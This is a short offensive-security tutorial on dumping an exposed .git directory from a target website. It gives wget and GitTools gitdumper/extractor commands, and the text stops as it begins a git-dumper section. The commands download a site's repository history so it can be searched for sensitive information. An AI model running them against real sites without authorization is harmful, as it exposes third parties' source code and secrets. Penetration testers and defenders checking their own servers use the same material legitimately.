Dump Git Repository from Website
If we can have permission to access git repositoy in target website, we can dump the git repository and investigate git logs or histories to get sensitive information.
Dumping
We can simply use wget
command in Linux to download the git repository.
After that, we can investigate files or all histories.
# -r: Recursive
wget -r https://example.com/.git/
cd example.com
git log --stat
git checkout <commit_id>
Dumping with gitdumper and extracter
GitTools downloads Git repository of the web application.
To dump the repository, execute the following commands.
wget https://raw.githubusercontent.com/internetwache/GitTools/master/Dumper/gitdumper.sh
chmod +x gitdumper.sh
./gitdumper.sh https://example.com/.git/ ./example
We should get the git repository in local.
Then extract the entire project by executing the following.
wget https://raw.githubusercontent.com/internetwache/GitTools/master/Extractor/extractor.sh
chmod +x extractor.sh
./extractor.sh ./example ./new_example
Now we retrieve the entire git project from website.
It is stored in “./new_example” folder. We can investigate the repository.
Dumping with Git-Dumper
git-dumper is an useful Python package.